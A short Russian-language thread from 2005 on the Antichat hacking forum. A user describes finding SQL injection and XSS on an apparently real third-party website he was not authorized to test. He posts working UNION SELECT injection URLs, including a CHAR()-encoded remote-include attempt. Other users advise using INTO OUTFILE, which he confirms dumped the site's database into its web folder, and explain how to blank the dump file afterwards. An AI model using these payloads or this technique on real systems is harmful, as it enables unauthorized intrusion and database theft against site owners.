Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   XSS & SQLijection в неизвестном (мне движке) (https://forum.antichat.xyz/showthread.php?t=6007)

Skala 12.04.2005 13:53
XSS & SQLijection в неизвестном (мне движке)
 
Нашел сайт, где есть уязвимость вида XSS и SQL-injection. Там такая картина: Если написать в адресе:
http://www.site.ru/in.php?part=dvn&det=null+union+SELECT+null,now(),n ow(),null,12,34,null,null/*
То выдается то, что ожидаю: заголовок статьи - "12", сама статья - 34. Но дальше возник вопрос: а мне-то что до этого? Я могу сделать insert в таблицу новостей, но хочется пойти дальше тупого варварства. Я написал такой адрес:
http://www.site.ru/in.php?part=dvn&det=null+union+SELECT+null,now(),n ow(),null,12,char(104,116,116,112,58,47,47,102,111 ,114,117,109,46,97,110,116,105,99,104,97,116,46,11 4,117,47,110,101,119,116,104,114,101,97,100,46,112 ,104,112),null,null/*
Вместо ожидаемого инклюда постороннего файла, пишется его название. Как вы думаете, в каком направлении дальше рыть (админский сайт защищен .htaccess)?

KEZ 12.04.2005 16:04
попробуй Into Outfile

Skala 13.04.2005 06:23
Вполне сработало, спасибо! Только админ вряд ли обрадуется, увидев у себя в веб-папке дамп своей базы :) Не подскажет ли кто, как его удалить?

coyl 13.04.2005 22:58
можно просто залить в него заново пустой запрос. и будет просто пустой файл.=)

Skala 14.04.2005 10:58
Спасибо за идею!


Время: 11:36